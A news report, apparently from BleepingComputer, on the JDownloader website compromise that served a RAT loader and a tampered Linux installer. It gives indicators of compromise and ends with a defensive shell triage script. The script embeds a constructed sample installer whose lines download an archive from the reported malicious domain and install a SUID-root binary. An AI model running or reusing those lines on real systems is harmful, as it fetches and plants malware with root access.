
The website for the popular JDownloader download manager was compromised earlier this week to distribute malicious Windows and Linux installers, with the Windows payload found to deploy a Python-based remote access trojan.
The supply chain attack affects those who downloaded installers from the official website between May 6 and May 7, 2026, through the Windows "Download Alternative Installer" links or the Linux shell installer.
According to the developers, the attackers modified the website's download links to point to malicious third-party payloads rather than the legitimate installers.
JDownloader is a widely used free download management utility that supports automated downloads from file-hosting services, video sites, and premium link generators. The software has been available for more than a decade and is used by millions of people worldwide across Windows, Linux, and macOS.
The JDownloader supply chain attack
The compromise was first reported on Reddit by a user named "PrinceOfNightSky," who noticed that the downloaded installers were being flagged by Microsoft Defender.
"I've been using Jdownloader and switched to a new PC a few weeks ago. Luckily I had the installer on a USB drive but decided to download the latest version," PrinceOfNightSky posted on Reddit.
"The website is legitimate but all the Exes for Windows are being reported as malicious software by Windows and the developer is being listed as 'Zipline LLC.' And other times it's saying 'The Water Team.' The software is clearly by Appwork and I have to manually unblock it from Windows to run it, which I can't do."
The JDownloader developers later confirmed that the site had been compromised and took the website offline to investigate the incident.
In an incident report, the developers said their website was compromised by attackers exploiting an unpatched vulnerability that allowed them to change the website's access control lists and content without authentication.
"Modifications were made through the website's content management system, affecting published pages and links," reads the incident report.
"The attacker did not gain access to the underlying server stack — specifically no access to the host filesystem or broader operating-system-level control beyond CMS-managed web content."
The developers stated that the compromise affected only the alternative Windows installer download links and the Linux shell installer link. In-app updates, macOS downloads, Flatpak, Winget, and Snap packages, and the main JDownloader JAR package were not modified.
The developers also said that users can check whether an installer is legitimate by right-clicking the file, selecting Properties, and then opening the Digital Signatures tab.
If the Digital Signatures tab shows the file was signed by "AppWork GmbH," it is legitimate. If the file is unsigned or signed under a different name, it should not be run.
[Image. Source: BleepingComputer]
The JDownloader team said that analyzing the malicious payloads was "out of our scope," but shared an archive of the malicious installers so that others could analyze them.
Cybersecurity researcher Thomas Klemenc analyzed the malicious Windows executables and shared indicators of compromise (IOCs) for the malware.
According to Klemenc, the malware acts as a loader that deploys a heavily obfuscated Python-based RAT.
Klemenc said the Python payload acts as a modular bot and RAT framework, allowing the attackers to execute Python code delivered from the command and control (C2) servers.
The researcher also shared two command and control servers used by the malware:
https://parkspringshotel[.]com/m/Lu6aeloo.php
https://auraguest[.]lk/m/douV2quu.php
BleepingComputer's analysis of the modified Linux shell installer found malicious code injected into the script that downloads an archive from 'checkinnhotels[.]com' disguised as an SVG file.
[Image. Source: BleepingComputer]
Once downloaded, the script extracts two ELF binaries named 'pkg' and 'systemd-exec' and then installs 'systemd-exec' as a SUID-root binary in '/usr/bin/'.
The installer then copies the main payload to '/root/.local/share/.pkg', creates a persistence script in '/etc/profile.d/systemd.sh', and launches the malware while masquerading as '/usr/libexec/upowerd'.
The 'pkg' payload is also heavily obfuscated using Pyarmor, so it is unclear what functionality it performs.
JDownloader says users are only at risk if they downloaded and executed the affected installers while the site was compromised.
As the malware could have executed arbitrary code on infected devices, those who ran the malicious installers are advised to reinstall their operating systems.
It is also possible that credentials stored on those devices were compromised, so it is strongly advised to reset passwords after the devices have been cleaned.
Hackers have increasingly targeted the websites of popular software tools this year to distribute malware to unsuspecting users.
In April, hackers compromised the CPUID website to change download links so that they served malicious executables for the popular CPU-Z and HWMonitor tools.
Earlier this month, threat actors compromised the DAEMONTOOLS website to distribute trojanized installers containing a backdoor.
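The following POSIX shell script is an added triage example, not code from BleepingComputer, Thomas Klemenc, or the JDownloader project. It turns the Linux indicators above into checks a responder can run: it greps a downloaded installer script for the domains reported here (and for a curl/wget fetch of a ".svg", since the archive was disguised as one), looks under a given root for the dropped files and the SUID bit on 'systemd-exec', and flags any running process whose command line claims to be upowerd while the executable behind /proc/PID/exe is something else. The sample installer text (including its URL path and file names) is constructed for the demo and is never executed, and the assumption that the upowerd masquerade shows up as an argv[0]/exe mismatch is mine; the domains and paths are the ones the article reports.

```shell
#!/bin/sh
# Added triage example (not BleepingComputer's or JDownloader's code).
# Domains and paths are the indicators reported in the article; the sample
# installer below and the process-name heuristic are constructed assumptions.

IOC_DOMAINS="checkinnhotels.com parkspringshotel.com auraguest.lk"
IOC_PATHS="/usr/bin/systemd-exec /root/.local/share/.pkg /etc/profile.d/systemd.sh"

# scan_installer FILE
# Prints each line of a downloaded shell installer that references an IOC domain,
# or that fetches a ".svg" with curl/wget. Returns 1 if anything matched, 0 if clean.
scan_installer() {
  local file="$1" status=0 d
  for d in $IOC_DOMAINS; do
    grep -n -F -- "$d" "$file" && status=1
  done
  grep -n -E '(curl|wget)[^|;]*\.svg' "$file" && status=1
  return "$status"
}

# triage_host ROOT
# Looks under ROOT (use / on a live system; a staging directory in tests) for the
# dropped files and for the SUID bit on systemd-exec. Prints one FOUND/SUID line
# per finding and nothing when clean.
triage_host() {
  local root="${1:-/}" p
  root="${root%/}"
  for p in $IOC_PATHS; do
    [ -e "$root$p" ] && echo "FOUND $root$p"
  done
  [ -u "$root/usr/bin/systemd-exec" ] && echo "SUID $root/usr/bin/systemd-exec"
  return 0
}

# check_procs
# Flags processes whose command line mentions upowerd but whose real executable
# (readlink /proc/PID/exe) is not named upowerd. Assumes the masquerade is by
# process name only; a renamed copy of the binary would not be caught.
check_procs() {
  local pid cmd exe
  for pid in /proc/[0-9]*; do
    pid=${pid#/proc/}
    cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null) || continue
    case "$cmd" in *upowerd*) ;; *) continue ;; esac
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null) || continue
    case "$exe" in
      */upowerd) ;;  # executable really is upowerd
      *) echo "MASQUERADE pid=$pid exe=$exe cmdline=$cmd" ;;
    esac
  done
  return 0
}

# write_sample_installer FILE
# Constructed stand-in for the tampered Linux installer, modelled on the article's
# description. The URL path and file names are invented; it is only written, never run.
write_sample_installer() {
  cat > "$1" <<'EOF'
#!/bin/sh
echo "Installing JDownloader..."
curl -fsSL "https://checkinnhotels.com/assets/logo.svg" -o /tmp/.logo.svg
tar -xzf /tmp/.logo.svg -C /tmp
install -m 4755 /tmp/systemd-exec /usr/bin/systemd-exec
EOF
}

main() {
  sample=$(mktemp)
  write_sample_installer "$sample"
  echo "== scanning constructed sample installer =="
  if scan_installer "$sample"; then echo "installer: clean"; else echo "installer: SUSPICIOUS"; fi
  rm -f "$sample"
  echo "== host triage (root=/) =="
  triage_host /
  check_procs
  echo "== done =="
}
main
```

Run it as root on a suspect machine so that /root and every /proc/PID/exe are readable; as an unprivileged user the process check silently skips processes it cannot inspect. Point scan_installer at the installer you actually downloaded, not at the constructed sample.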